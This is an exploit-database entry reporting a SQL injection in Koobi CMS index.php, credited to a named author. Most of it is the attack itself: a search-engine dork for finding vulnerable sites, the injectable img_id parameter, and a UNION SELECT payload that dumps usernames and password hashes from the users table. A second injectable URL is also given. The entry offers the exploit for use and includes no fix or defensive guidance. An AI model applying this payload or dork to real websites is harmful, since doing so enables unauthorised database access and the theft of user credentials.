Koobi CMS (index.php) SQL Injection Vulnerability

2010-07-12T00:00:00
ID 1337DAY-ID-13314
Type zdt
Reporter SIL3NCIO
Modified 2010-07-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================
Koobi CMS (index.php) SQL Injection Vulnerability 
=================================================

# Exploit Title :    Koobi CMS (index.php) SQL Injection Vulnerability
 
# Date :             July 12  2010
 
# Author :           SIL3NCIO
 
# Email :            [email protected]
 
# Version:           4.3.0 & 4.2.5 & 4.2.4 Maybe Higher Versions are affected too
 
# Tested on:         Win Xp Sp3
 
# Dork :             inurl:"index.php?p=gallerypic img_id"
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Exploit~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
[Exploit] :  http://site.com/path/index.php?p=gallerypic&img_id=[SQLi]
 
-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users--
 
http://site.com/path/index.php?p=showposter&p=misc&tid=[SQL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note : Proud to be Tunisian
 
[wrass la7nina sa7li]



#  0day.today [2018-04-12]  #